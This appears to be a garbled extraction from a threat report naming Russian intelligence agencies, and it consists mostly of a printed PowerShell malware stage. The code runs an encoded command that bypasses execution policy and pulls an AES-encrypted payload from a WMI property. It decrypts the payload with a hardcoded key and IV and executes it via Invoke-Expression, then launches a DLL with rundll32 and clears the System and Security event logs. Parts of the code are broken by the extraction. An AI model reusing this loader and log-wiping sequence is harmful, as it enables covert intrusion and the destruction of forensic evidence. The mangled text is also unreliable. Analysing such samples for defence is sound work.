----- ----- **Главное Разведывательное Управление** **“** **”** **Федеральная Служба Безопасности** **Служба Внешней Разведки** **powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand** **ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQAp** ----- **function perfCr($crTr, $data){** **$ret = $null** **try{** **$ms = New-Object System.IO.MemoryStream** **$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList** **@($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)** **$cs.Write($data, 0, $data.Length)** **$cs.FlushFinalBlock()** **$ret = $ms.ToArray()** **$cs.Close()** **$ms.Close()** **}** **catch{}** **return $ret** **}** **function decrAes($encData, $key, $iv)** **{** **$ret = $null** **try{** **$prov = New-Object System.Security.Cryptography.RijndaelManaged** **$prov.Key = $key** **$prov.IV = $iv** **$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)** **$ret = perfCr $decr $encData** **}** **Catch{}** **return $ret** **}** **function sWP($cN, $pN, $aK, $aI)** **{** **if($cN -eq $null -or $pN -eq $null){return $false}** **try{** **$wp = ([wmiclass]$cN).Properties[$pN].Value** **$exEn = [Convert]::FromBase64String($wp)** **$exDec = decrAes $exEn $aK $aI** **$ex = [Text.Encoding]::UTF8.GetString($exDec)** **if($ex -eq $null -or $ex -eq ”)** **{return}** **Invoke-Expression $ex** **return $true** **}** **t h{** ----- **}** **$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee,** **0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43,** **0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)** **$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9,** **0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)** **sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null** **rundll32.exe “C:\Windows\twain_64.dll”** **wevtutil cl** **System** **wevtutil cl Security** ----- ----- **“** **”** **…** ----- ----- **“** **”** ----- **©** -----